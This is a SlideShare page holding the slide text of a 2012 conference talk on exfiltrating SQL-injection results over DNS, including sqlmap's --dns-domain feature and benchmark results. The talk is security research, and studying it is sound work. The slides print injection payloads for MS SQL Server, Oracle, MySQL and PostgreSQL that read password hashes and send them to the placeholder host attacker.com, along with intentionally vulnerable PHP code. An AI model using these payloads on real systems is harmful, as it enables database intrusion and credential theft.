SlideShare a Scribd company logo

DNS exfiltration using sqlmap

Miroslav Stampar
Miroslav Stampar

These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.

Technology
1 of 26
Download to read offline
DNS exfiltration using sqlmap Miroslav Štampar (dev@sqlmap.org)
What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) PHDays 2012, Moscow (Russia) May 31, 2012 2
What is SQL injection? (2)  In plain speak, SQL injection is all about the unauthorized database access  “Hello World” vulnerable code example (PHP/MySQL):     $sql = "SELECT * FROM events WHERE id = " .  $_GET["id"];     $result = mysql_query($sql);  Sample attack:   http://www.target.com/vuln.php?id=1 AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x3a, (SELECT password FROM mysql.user LIMIT  0,1),0x3a,FLOOR(RAND(0)*2))x FROM  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) PHDays 2012, Moscow (Russia) May 31, 2012 3
What is SQL injection? (3)  Harder example (PHP/MySQL):     error_reporting(0);     set_magic_quotes_runtime(true);     $sql=”INSERT INTO Users (FirstName, LastName,  Age) VALUES  ('$_REQUEST[firstname]','$_REQUEST[lastname]', $_REQUEST[age])”;     @mysql_query($sql); PHDays 2012, Moscow (Russia) May 31, 2012 4
Technique classification  Inband (web page as channel) Union  Full  Partial Error-based  Inference (bit-by-bit) Boolean-based blind Time-based (and stacked queries)  Out-of-band (alternative transport channels) HTTP DNS PHDays 2012, Moscow (Russia) May 31, 2012 5
Inband techniques  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request PHDays 2012, Moscow (Russia) May 31, 2012 6
Inference techniques  Boolean-based blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked queries – ;INSERT INTO users VALUES  (10, 'test', 'testpass'), usually time-based data retrieval PHDays 2012, Moscow (Russia) May 31, 2012 7
Out-of-band (OOB) techniques  HTTP – AND LENGTH(UTL_HTTP.REQUEST  ('http://www.attacker.com/log.php?q='|| (SELECT password FROM SYS.USER$ WHERE  name='SYS')))>0, fast, 1 (sub)query result per request, capturing/logging HTTP requests at the other side  DNS – AND LENGTH(UTL_INADDR.  GET_HOST_ADDRESS((SELECT password FROM  SYS.USER$ WHERE  name='SYS')||'.attacker.com'))>0, relatively fast, 1 part of (sub)query result per request, capturing/logging DNS requests at the other side PHDays 2012, Moscow (Russia) May 31, 2012 8
DNS protocol  relatively simple protocol  resolving domain names  UDP datagrams (except zone transfers which use TCP)  forwarding requests for arbitrary domain names  ...even if access to public networks is not allowed :) PHDays 2012, Moscow (Russia) May 31, 2012 9
DNS protocol (2)  Name resolving methods: Client lookup – checking local client's cache (same request already occurred) Iterative – checking DNS server's cache and configured zone records Recursive – if other methods fail, query is forwarded to others, sending back retrieved results to client PHDays 2012, Moscow (Russia) May 31, 2012 10
DNS protocol (3) PHDays 2012, Moscow (Russia) May 31, 2012 11
DNS exfiltration “Exfiltration [eks-fil-treyt, eks-fil-treyt] 1. verb (used without object) to escape furtively from an area under enemy control 2. verb (used with object) to smuggle out of an area under enemy control” (source: dictionary.reference.com) PHDays 2012, Moscow (Russia) May 31, 2012 12
DNS exfiltration (2)  When fast inband techniques fail data is (usually) extracted in a bit-by-bit manner  Most attackers will avoid exploitation of targets with time-based technique  Non-query SQL statements like INSERT/UPDATE/DELETE are especially problematic  Alternative methods are more than welcome (e.g. uploading of web shell scripts)  OOB techniques are rarely used (till now) PHDays 2012, Moscow (Russia) May 31, 2012 13
DNS exfiltration (3)  In some cases it's possible to incorporate SQL (sub)query results into DNS resolution requests  Any function that accepts network address could be used  Microsoft SQL Server, Oracle, MySQL and PostgreSQL  Potentially dozens of resulting characters can be transferred per single request PHDays 2012, Moscow (Russia) May 31, 2012 14
DNS exfiltration (4)  Microsoft SQL Server:     DECLARE @host varchar(1024);     SELECT @host=(SELECT TOP 1  master.dbo.fn_varbintohexstr(password_hash) FROM  sys.sql_logins WHERE name='sa')+'.attacker.com';     EXEC('master..xp_dirtree "'+@host+'c$"'); PHDays 2012, Moscow (Russia) May 31, 2012 15
DNS exfiltration (5)  Oracle:     SELECT DBMS_LDAP.INIT((SELECT password FROM  SYS.USER$ WHERE name='SYS')||'.attacker.com',80)  FROM DUAL;  MySQL:     SELECT LOAD_FILE(CONCAT('',(SELECT  password FROM mysql.user WHERE user='root' LIMIT  1),'.attacker.comfoobar')); PHDays 2012, Moscow (Russia) May 31, 2012 16
DNS exfiltration (6)  PostgreSQL:     DROP TABLE IF EXISTS table_output;     CREATE TABLE table_output(content text);     CREATE OR REPLACE FUNCTION temp_function()     RETURNS VOID AS $$     DECLARE exec_cmd TEXT;     DECLARE query_result TEXT;     BEGIN         SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE  usename='postgres');         exec_cmd := E'COPY table_output(content) FROM E''|| query_result||E'.attacker.comfoobar.txt'';         EXECUTE exec_cmd;     END;     $$ LANGUAGE plpgsql SECURITY DEFINER;     SELECT temp_function(); PHDays 2012, Moscow (Russia) May 31, 2012 17
DNS exfiltration (7) PHDays 2012, Moscow (Russia) May 31, 2012 18
DNS exfiltration (8) PHDays 2012, Moscow (Russia) May 31, 2012 19
Integration into sqlmap  New command line option: --dns-domain Turning on DNS exfiltration support Domain where should provoked DNS requests point to (e.g. --dns-domain=attacker.com)  DNS exfiltration vectors sent through previously detected SQLi (e.g. time-based)  Inband techniques have automatically higher priority  Hence, usable only in inference-only cases PHDays 2012, Moscow (Russia) May 31, 2012 20
Integration into sqlmap (2)  Domain name server entry (e.g. ns1.attacker.com) has to point to IP address of machine running sqlmap sqlmap being run as a fake DNS server Serving and logging all incoming DNS requests Dummy responses (e.g. 127.0.0.1) sent just to unblock web server instance PHDays 2012, Moscow (Russia) May 31, 2012 21
Integration into sqlmap (3)  Each pushed result enclosed with unique prefix and suffix (e.g. Xzk. … .iUR.attacker.com) Cancelling caching mechanisms Easy to match SQLi requests with DNS results  Complying with RFC 1034 (Domain Names – Concepts and Facilities) Hex encoding results to preserve non-word chars Splitting long items to parts of length 63 (maximum length of one label name) Otherwise DNS resolution requests are immediately dropped as invalid (no resolution) PHDays 2012, Moscow (Russia) May 31, 2012 22
Experimental setup 1)Attacker (172.16.138.1) ➢ physical machine – Ubuntu 12.04 LTS 64-bit OS ➢ sqlmap v1.0-dev (r5100) 2)Web Server (172.16.138.129) ➢ virtual machine – Windows XP 32-bit SP1 OS ➢ XAMPP 1.7.3 with SQLi vulnerable MySQL/PHP web application 3)DNS Server (172.16.138.130) ➢ virtual machine – CentOS 6.2 64-bit OS ➢ BIND9 DNS daemon PHDays 2012, Moscow (Russia) May 31, 2012 23
Results (--dump -T COLLATIONS -D information_schema) Method # of requests Time (sec) Boolean-based blind 29,212 214.04 Time-based (1 sec) 32,716 17,720.51 Error-based 777 9.02 Union (full/partial) 3/136 0.70/2.50 DNS exfiltration 1,409 35.31 PHDays 2012, Moscow (Russia) May 31, 2012 24
Video presentation PHDays 2012, Moscow (Russia) May 31, 2012 25
Questions? PHDays 2012, Moscow (Russia) May 31, 2012 26

Recommended

Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internalsMiroslav Stampar
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 

Recommended

Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internalsMiroslav Stampar
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Faster, better, stronger: The new InnoDB
Faster, better, stronger: The new InnoDBFaster, better, stronger: The new InnoDB
Faster, better, stronger: The new InnoDBMariaDB plc
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 

More Related Content

What's hot

ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Faster, better, stronger: The new InnoDB
Faster, better, stronger: The new InnoDBFaster, better, stronger: The new InnoDB
Faster, better, stronger: The new InnoDBMariaDB plc
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 

What's hot (20)

ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection
Sql injectionSql injection
Sql injection
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the Hood
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Sql injection
Sql injectionSql injection
Sql injection
 
Faster, better, stronger: The new InnoDB
Faster, better, stronger: The new InnoDBFaster, better, stronger: The new InnoDB
Faster, better, stronger: The new InnoDB
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Sql injection
Sql injectionSql injection
Sql injection
 

Viewers also liked

sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksMiroslav Stampar
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)Miroslav Stampar
 
WordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressWordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressandrewnacin
 
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...Shannon Smith
 
eMusic: WordPress in the Enterprise
eMusic: WordPress in the EnterpriseeMusic: WordPress in the Enterprise
eMusic: WordPress in the EnterpriseScott Taylor
 
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...andrewnacin
 
E-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the MinefieldE-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the MinefieldIngenesis Limited
 
Don't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit TestingDon't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit Testingaaronjorbin
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacksMiroslav Stampar
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web VulnerabilityMiroslav Stampar
 

Viewers also liked (20)

sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmap
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & Tricks
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS Attack
 
WordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressWordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPress
 
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
 
eMusic: WordPress in the Enterprise
eMusic: WordPress in the EnterpriseeMusic: WordPress in the Enterprise
eMusic: WordPress in the Enterprise
 
Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the Buffer
 
Index chrome
Index chromeIndex chrome
Index chrome
 
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
 
How Testing Changed My Life
How Testing Changed My LifeHow Testing Changed My Life
How Testing Changed My Life
 
E-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the MinefieldE-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the Minefield
 
Don't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit TestingDon't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit Testing
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
 

Similar to DNS exfiltration using sqlmap

Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.Positive Hack Days
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPositive Hack Days
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPositive Hack Days
 
Building node.js applications with Database Jones
Building node.js applications with Database JonesBuilding node.js applications with Database Jones
Building node.js applications with Database JonesJohn David Duncan
 
Sql injection
Sql injectionSql injection
Sql injectionBee_Ware
 
Distributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevdayDistributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevdayodnoklassniki.ru
 
A survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E CommunityA survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E CommunityShumon Huque
 
Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2rusersla
 
Yandex.Mail success story
Yandex.Mail success storyYandex.Mail success story
Yandex.Mail success storydev1ant
 
About "Apache Cassandra"
About "Apache Cassandra"About "Apache Cassandra"
About "Apache Cassandra"Jihyun Ahn
 
Jump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with DatabricksJump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with DatabricksAnyscale
 
Teradata online training
Teradata online trainingTeradata online training
Teradata online trainingMonster Courses
 
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...Citus Data
 
The two faces of sql parameter sniffing
The two faces of sql parameter sniffingThe two faces of sql parameter sniffing
The two faces of sql parameter sniffingIvo Andreev
 

Similar to DNS exfiltration using sqlmap (20)

Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
RDBMS vs NoSQL
RDBMS vs NoSQLRDBMS vs NoSQL
RDBMS vs NoSQL
 
Mdb dn 2016_06_query_primer
Mdb dn 2016_06_query_primerMdb dn 2016_06_query_primer
Mdb dn 2016_06_query_primer
 
Building node.js applications with Database Jones
Building node.js applications with Database JonesBuilding node.js applications with Database Jones
Building node.js applications with Database Jones
 
Sql injection
Sql injectionSql injection
Sql injection
 
phptut4
phptut4phptut4
phptut4
 
phptut4
phptut4phptut4
phptut4
 
Distributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevdayDistributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevday
 
A survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E CommunityA survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E Community
 
Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2
 
Yandex.Mail success story
Yandex.Mail success storyYandex.Mail success story
Yandex.Mail success story
 
About "Apache Cassandra"
About "Apache Cassandra"About "Apache Cassandra"
About "Apache Cassandra"
 
Quebec pdo
Quebec pdoQuebec pdo
Quebec pdo
 
Jump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with DatabricksJump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with Databricks
 
Teradata online training
Teradata online trainingTeradata online training
Teradata online training
 
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
 
The two faces of sql parameter sniffing
The two faces of sql parameter sniffingThe two faces of sql parameter sniffing
The two faces of sql parameter sniffing
 

More from Miroslav Stampar

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"Miroslav Stampar
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Miroslav Stampar
 
Improving Network Intrusion Detection with Traffic Denoise
